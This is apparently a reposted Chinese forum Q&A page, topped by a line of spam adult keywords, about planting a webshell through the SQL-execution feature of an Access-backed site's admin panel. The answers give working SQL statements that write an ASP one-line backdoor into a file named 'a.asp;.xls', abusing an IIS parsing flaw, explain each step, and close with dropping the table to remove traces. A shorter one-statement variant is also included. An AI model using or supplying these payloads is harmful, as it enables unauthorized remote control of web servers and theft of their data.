亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

ACCESS數(shù)據(jù)庫后臺(tái)sql語句執(zhí)行導(dǎo)shell的方法

  發(fā)布時(shí)間:2011-03-31 21:50:06   作者:佚名   我要評(píng)論
一個(gè)垃圾論壇,access數(shù)據(jù)庫,無其他可利用之處,不過有個(gè)sql語句執(zhí)行功能,絕對(duì)路徑也知道,小弟對(duì)sql語句不懂,記得如果是mysql數(shù)據(jù)庫root權(quán)限可以導(dǎo)出SHELL,這個(gè)是否也能導(dǎo)出shell呢?
需要什么條件,語句又是什么?網(wǎng)上翻不到資料。麻煩各位。

答:

create table cmd (a varchar(50))
insert into cmd (a) values ('<%execute request("a")%>')
select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd
drop table cmd

解釋如下:
1.create table a (a varchar(50)) 建立一個(gè)有一個(gè)A字段的表 表名為a 字段類型為字符 長(zhǎng)度為50
2.insert into a (a) values ('<%execute request("a")%>') 在表a的a字段插入密碼為a的一句話木馬
3.select * into [a] in 'F:\jt\work\a.asp;.xls' 'excel 4.0;' from a 把表a的內(nèi)容導(dǎo)出為物理路徑的一個(gè)
EXCEL文件,為什么用excel文件,因?yàn)锳CCESS數(shù)據(jù)庫不允許導(dǎo)出其他危險(xiǎn)格式。我們導(dǎo)出為EXCEL后在利用IIS解析漏洞就可以變成我們的小馬了。很*的說~~
4.drop table a 丟家伙閃人 射完就走!

小弟的提問,沒兩分鐘大家就回答了,強(qiáng)烈頂t00ls牛淫。

這個(gè)更簡(jiǎn)單:

Access利用后臺(tái)SQL執(zhí)行命令功能導(dǎo)出WebShell:
SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote
后臺(tái)提供SQL執(zhí)行功能且知道絕對(duì)路徑方可使用(vote為已知表段)

相關(guān)文章

最新評(píng)論